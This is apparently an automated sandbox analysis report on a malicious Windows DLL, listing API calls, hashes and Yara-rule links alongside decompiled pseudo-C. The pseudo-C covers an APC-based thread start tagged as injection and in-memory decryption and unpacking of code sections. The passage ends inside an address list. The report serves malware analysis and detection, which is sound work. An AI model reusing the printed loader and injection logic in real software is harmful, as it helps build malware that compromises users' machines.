GetSystemTime.KERNEL32(?,76D263F0,00000000), ref: 6D6417CB
SwitchToThread.KERNEL32 ref: 6D6417D1

Part of subcall function 6D6415A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6D6415F9
Part of subcall function 6D6415A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6D6417EC), ref: 6D64168B
Part of subcall function 6D6415A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6D6416A6

Sleep.KERNELBASE(00000000,00000000), ref: 6D6417F4
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6D64183C
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6D64185A
WaitForSingleObject.KERNEL32(00000000,000000FF,6D6416EC,?,00000000), ref: 6D64188C
GetExitCodeThread.KERNEL32(00000000,?), ref: 6D6418A0
CloseHandle.KERNEL32(00000000), ref: 6D6418A7
GetLastError.KERNEL32(6D6416EC,?,00000000), ref: 6D6418AF
GetLastError.KERNEL32 ref: 6D6418C2

Memory Dump Source

Source File: 00000001.00000002.513118342.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000001.00000002.513091226.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513157368.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513202631.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.513228684.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: c8bd3911f0359a613a52c110b737961a01ad385acc3c3e8c83169b3a3962e1e0
Instruction ID: ffee2dc5322490a884c87b5f6baf307be8a3318b26bd4337db716aef33823183
Opcode Fuzzy Hash: c8bd3911f0359a613a52c110b737961a01ad385acc3c3e8c83169b3a3962e1e0
Instruction Fuzzy Hash: 4A31D2718487169FD750EF668C44A6B7BFCEB8E754F00CA2AF524C2140E738C5508BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D68D1A5, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000706,00003000,00000040,00000706,6D68CC00), ref: 6D68D262
VirtualAlloc.KERNEL32(00000000,0000002B,00003000,00000040,6D68CC5E), ref: 6D68D299
VirtualAlloc.KERNEL32(00000000,0000F0E3,00003000,00000040), ref: 6D68D2F9
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D68D32F
VirtualProtect.KERNEL32(6D640000,00000000,00000004,6D68D184), ref: 6D68D434
VirtualProtect.KERNEL32(6D640000,00001000,00000004,6D68D184), ref: 6D68D45B
VirtualProtect.KERNEL32(00000000,?,00000002,6D68D184), ref: 6D68D528
VirtualProtect.KERNEL32(00000000,?,00000002,6D68D184,?), ref: 6D68D57E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D68D59A

Memory Dump Source

Source File: 00000001.00000002.513537298.000000006D68C000.00000040.00020000.sdmp, Offset: 6D68C000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 25765cf8fc345e293d894565df2a5847854e54997380a13ec6d8e60e9d1bf4c5
Instruction ID: 21d4a082d8645f396888fda5012fee34e6a872d62aa82eab90f7e89252e3408a
Opcode Fuzzy Hash: 25765cf8fc345e293d894565df2a5847854e54997380a13ec6d8e60e9d1bf4c5
Instruction Fuzzy Hash: 6BD157765006019FEB11CF14C890BA277A6FFC8310B2945AAEE1E9F65BD770A811EF74

Uniqueness

Uniqueness Score: -1.00%

Function 6D641E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6d644188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6d64418c;
						if( *0x6d64418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6d644198;
								if( *0x6d644198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6d64418c);
						}
						HeapDestroy( *0x6d644190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6d644188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6d644190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6d6441b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6D641CA4(E6D641D32, E6D641EE0(_a12, 1, 0x6d644198, _t41));
							 *0x6d64418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6d641e07
0x6d641e13
0x6d641e15
0x6d641e18
0x6d641e8e
0x6d641e94
0x6d641e96
0x6d641e98
0x6d641e9e
0x6d641ea0
0x6d641ea5
0x6d641ea8
0x6d641eb3
0x6d641eb5
0x00000000
0x00000000
0x6d641eb7
0x6d641eba
0x6d641ebc
0x00000000
0x00000000
0x00000000
0x6d641ebc
0x6d641ec4
0x6d641ec4
0x6d641ed0
0x6d641ed0
0x6d641e1a
0x6d641e1b
0x6d641e3b
0x6d641e41
0x6d641e43
0x6d641e48
0x6d641e84
0x6d641e84
0x6d641e4a
0x6d641e52
0x6d641e59
0x6d641e63
0x6d641e6f
0x6d641e76
0x6d641e7b
0x6d641e80
0x00000000
0x6d641e80
0x6d641e7b
0x6d641e48
0x6d641e1b
0x6d641edd

APIs

InterlockedIncrement.KERNEL32(6D644188), ref: 6D641E26
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6D641E3B

Part of subcall function 6D641CA4: CreateThread.KERNELBASE ref: 6D641CBB
Part of subcall function 6D641CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6D641CD0
Part of subcall function 6D641CA4: GetLastError.KERNEL32(00000000), ref: 6D641CDB
Part of subcall function 6D641CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6D641CE5
Part of subcall function 6D641CA4: CloseHandle.KERNEL32(00000000), ref: 6D641CEC
Part of subcall function 6D641CA4: SetLastError.KERNEL32(00000000), ref: 6D641CF5

InterlockedDecrement.KERNEL32(6D644188), ref: 6D641E8E
SleepEx.KERNEL32(00000064,00000001), ref: 6D641EA8
CloseHandle.KERNEL32 ref: 6D641EC4
HeapDestroy.KERNEL32 ref: 6D641ED0

Memory Dump Source

Source File: 00000001.00000002.513118342.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000001.00000002.513091226.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513157368.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513202631.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.513228684.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 224ef3ca8bf037041dfcd2f2905b5c307a5dbefd15a9cf4933b6dfbb8a12170f
Instruction ID: c24e609894ab569817155d56abb1fbce012a0125bf7752f0b7290e077295bec1
Opcode Fuzzy Hash: 224ef3ca8bf037041dfcd2f2905b5c307a5dbefd15a9cf4933b6dfbb8a12170f
Instruction Fuzzy Hash: 8D216375A40206EBCB10AFAACC85B7B7BB8FB6E7A4711C129E505D3140E7B89994CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D641CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D641CA4(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6d6441cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6d641cbb
0x6d641cc1
0x6d641cc5
0x6d641cd0
0x6d641cd8
0x6d641ce1
0x6d641ce5
0x6d641cec
0x6d641cf3
0x6d641cf5
0x6d641cfb
0x6d641cd8
0x6d641cff

APIs

CreateThread.KERNELBASE ref: 6D641CBB
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6D641CD0
GetLastError.KERNEL32(00000000), ref: 6D641CDB
TerminateThread.KERNEL32(00000000,00000000), ref: 6D641CE5
CloseHandle.KERNEL32(00000000), ref: 6D641CEC
SetLastError.KERNEL32(00000000), ref: 6D641CF5

Memory Dump Source

Source File: 00000001.00000002.513118342.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000001.00000002.513091226.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513157368.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513202631.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.513228684.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 449769e967f6d0d0ec88419ee939830e0194b7c9b477119e104a127e09118c8f
Instruction ID: 1223535de57d9b0205c45c720c518ca502104675c5d99a13959a02a1214cdf7f
Opcode Fuzzy Hash: 449769e967f6d0d0ec88419ee939830e0194b7c9b477119e104a127e09118c8f
Instruction Fuzzy Hash: FBF08232244621FBDB217FA28C0CF5B7F79FF0AB11F00C604F61591140C72588918B95

Uniqueness

Uniqueness Score: -1.00%

Function 6D672FCC, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(000000FF,000031E4,6D792898), ref: 6D67302B

Strings

;1, xrefs: 6D67300E, 6D67309F
;1, xrefs: 6D67303B
1, xrefs: 6D672FE0

Memory Dump Source

Source File: 00000001.00000002.513311409.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID: ;1$;1$1
API String ID: 544645111-3098204872
Opcode ID: 52fd0e30c2149a16a8cb89ac45313c894fe2bc1546a26c19883d908a1d887054
Instruction ID: d5867ce4cc7b734bc07f794f607014540b70a1c2d313a5df4f7ec9ce761f546a
Opcode Fuzzy Hash: 52fd0e30c2149a16a8cb89ac45313c894fe2bc1546a26c19883d908a1d887054
Instruction Fuzzy Hash: DD312F7190029AAFCF14CFAED450ABCBBF0FF06309B08459AD475D7282E3389255EB64

Uniqueness

Uniqueness Score: -1.00%

Function 6D6415A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D6415A3(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6d6441b0;
				_t39 = E6D641A4B(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6d6441cc;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6d645137; // 0x6d645137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6D641D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6d6441cc = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x6d6415aa
0x6d6415ba
0x6d6415c1
0x6d6415c4
0x6d6415d9
0x6d6415e0
0x6d6415e5
0x6d6415f6
0x6d6415f9
0x6d641601
0x6d641604
0x6d6416ae
0x6d64160a
0x6d64160a
0x6d64160e
0x6d641676
0x6d641610
0x6d641610
0x6d641613
0x6d641615
0x6d64161d
0x6d641620
0x6d641623
0x6d64162b
0x6d641633
0x6d641634
0x6d641635
0x6d64163c
0x6d64163c
0x6d641650
0x6d641655
0x6d64165e
0x6d641665
0x6d641668
0x6d64166c
0x6d641671
0x00000000
0x00000000
0x6d641628
0x6d641628
0x6d641673
0x6d641680
0x6d641695
0x6d641682
0x6d64168b
0x6d641690
0x6d6416a6
0x6d6416a6
0x6d6416b5
0x6d6416bb

APIs

VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6D6415F9
memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6D6417EC), ref: 6D64168B
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6D6416A6

Strings

Mar 26 2021, xrefs: 6D64162B

Memory Dump Source

Source File: 00000001.00000002.513118342.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000001.00000002.513091226.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513157368.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513202631.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.513228684.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 26 2021
API String ID: 4010158826-2175073649
Opcode ID: 259b8453c2a523f9e91c7aac9f5710d496f6ed32235d9c4558fa362f731f6bba
Instruction ID: 8d6cf667ee42814e40dfd3baf69d1e12f448864ea01c51e567b690f0be6d11d9
Opcode Fuzzy Hash: 259b8453c2a523f9e91c7aac9f5710d496f6ed32235d9c4558fa362f731f6bba
Instruction Fuzzy Hash: E431A171E4021AAFCF00DF99C880BEEBBB9FF49314F14C129E504A7240D775AA558F94

Uniqueness

Uniqueness Score: -1.00%

Function 6D641D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D641D32(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6D6417A7(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6d641d3b
0x6d641d40
0x6d641d4e
0x6d641d53
0x6d641d53
0x6d641d59
0x6d641d5e
0x6d641d62
0x6d641d66
0x6d641d66
0x6d641d70
0x6d641d79

APIs

GetCurrentThread.KERNEL32 ref: 6D641D35
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6D641D40
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6D641D53
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6D641D66

Memory Dump Source

Source File: 00000001.00000002.513118342.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000001.00000002.513091226.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513157368.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513202631.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.513228684.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 1d8b4385edc55e9bd8bdf85b7dc0dfa8ed9793c8105bb8d30334d093e78092d2
Instruction ID: 2dc0cb9a874e38038bb1570cba7ba1f0b560fa106bd6822acc42036f3bc26ab0
Opcode Fuzzy Hash: 1d8b4385edc55e9bd8bdf85b7dc0dfa8ed9793c8105bb8d30334d093e78092d2
Instruction Fuzzy Hash: F8E022303453112BD3122A2A4C88F6B7B6CDF9B331B02C335F624C21D0CB988C198AA5

Uniqueness

Uniqueness Score: -1.00%

Function 6D6740F0, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6D673CB9,?), ref: 6D674105

Memory Dump Source

Source File: 00000001.00000002.513311409.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 9f2c6fd79c695cd129b6db8b47a92bbfa8acc0dddd6259858928e58d873b89ea
Instruction ID: 0bc18035da2cac5f943cf60fbb82ebdd0ab5881f69bd0006e3766b2b25bacb90
Opcode Fuzzy Hash: 9f2c6fd79c695cd129b6db8b47a92bbfa8acc0dddd6259858928e58d873b89ea
Instruction Fuzzy Hash: 89D05E725543495BDB10AE719C097627BFC9389799F104435F90DCA140E674D591D500

Uniqueness

Uniqueness Score: -1.00%

Function 6D675C89, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMT ref: 6D675C8B

Part of subcall function 6D675C17: RtlEncodePointer.NTDLL(00000000,?,6D675C90,00000000,6D678345,6D794110,00000000,00000314,?,6D675ADF,6D794110,6D6480A8,00012010), ref: 6D675C7E

Memory Dump Source

Source File: 00000001.00000002.513311409.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: EncodePointer__encode_pointer
String ID:
API String ID: 4150071819-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: fda2fa7484b98ce6b1cfe75b2e1cbc23e42b685d15bc1c03f6bedac8f0ab8af6
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6D67BE2F, Relevance: 66.4, APIs: 44, Instructions: 432COMMON

Download Yara Rule

APIs

___getlocaleinfo.LIBCMT ref: 6D67BE66
___getlocaleinfo.LIBCMT ref: 6D67BE7B
___getlocaleinfo.LIBCMT ref: 6D67BE90
___getlocaleinfo.LIBCMT ref: 6D67BEA5
___getlocaleinfo.LIBCMT ref: 6D67BEBD
___getlocaleinfo.LIBCMT ref: 6D67BED2
___getlocaleinfo.LIBCMT ref: 6D67BEE4
___getlocaleinfo.LIBCMT ref: 6D67BEF9
___getlocaleinfo.LIBCMT ref: 6D67BF11
___getlocaleinfo.LIBCMT ref: 6D67BF26

Memory Dump Source

Source File: 00000001.00000002.513311409.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: ___getlocaleinfo
String ID:
API String ID: 1937885557-0
Opcode ID: ec4cfb9cd1c66f1ee37d8fd0d0a81c3be357d00ce7ab14daa680d271b3f4a16c
Instruction ID: db543e26fbb1013355efdaf88eb01696a81ddb6e47612269c12bb2feedef491c
Opcode Fuzzy Hash: ec4cfb9cd1c66f1ee37d8fd0d0a81c3be357d00ce7ab14daa680d271b3f4a16c
Instruction Fuzzy Hash: B5E19EB290020EBEFB21CAE1CD45DFF77BDEB08748F05092AF25592050EA75AF099765

Uniqueness

Uniqueness Score: -1.00%

Function 6D642485, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D642485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6d6441f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6d644240 = 1;
										__eflags =  *0x6d644240;
										if( *0x6d644240 != 0) {
											goto L60;
										}
										_t84 =  *0x6d6441f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6d644240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6d6441f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6d644200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6d6441fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6d644200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d644200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6d644240 = 1;
							__eflags =  *0x6d644240;
							if( *0x6d644240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6d644200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6d644200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6d644240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6d644200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6d6441f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6d644200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d644200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6d64248f
0x6d642492
0x6d642498
0x6d6424b6
0x00000000
0x6d6424b6
0x6d6424a0
0x6d6424a9
0x6d6424af
0x6d6424be
0x6d6424c1
0x6d6424c4
0x6d6424ce
0x6d6424ce
0x6d6424d0
0x6d6424d3
0x6d6424d5
0x6d6424d5
0x6d6424d7
0x6d6424da
0x00000000
0x00000000
0x6d6424dc
0x6d6424de
0x6d642544
0x6d642544
0x6d6426a2
0x00000000
0x6d6426a2
0x6d6424e0
0x6d6424e0
0x6d6424e4
0x6d6424e6
0x6d6424e6
0x6d6424e6
0x6d6424e6
0x6d6424e9
0x6d6424ea
0x6d6424ed
0x6d6424ed
0x6d6424f1
0x6d6424f5
0x6d642503
0x6d642503
0x6d64250b
0x6d642511
0x6d642513
0x6d642515
0x6d642525
0x6d642532
0x6d642536
0x6d64253b
0x6d64253d
0x6d6425bb
0x6d6425bb
0x6d64253f
0x6d64253f
0x6d64253f
0x6d6425bd
0x6d6425bf
0x6d6426a0
0x6d6426a0
0x00000000
0x6d6425c5
0x6d6425c5
0x6d6425cc
0x00000000
0x00000000
0x6d6425d2
0x6d6425d6
0x6d642632
0x6d642634
0x6d64263c
0x6d64263e
0x6d642640
0x00000000
0x00000000
0x6d642642
0x6d642648
0x6d64264a
0x6d64264c
0x6d642661
0x6d642661
0x6d642663
0x6d642692
0x6d642699
0x00000000
0x6d642699
0x6d642667
0x6d642668
0x6d64266a
0x6d64266c
0x6d64266c
0x6d64266e
0x6d642670
0x6d642672
0x6d642686
0x6d642686
0x6d642689
0x6d64268b
0x6d64268b
0x6d64268c
0x6d64268c
0x00000000
0x6d642674
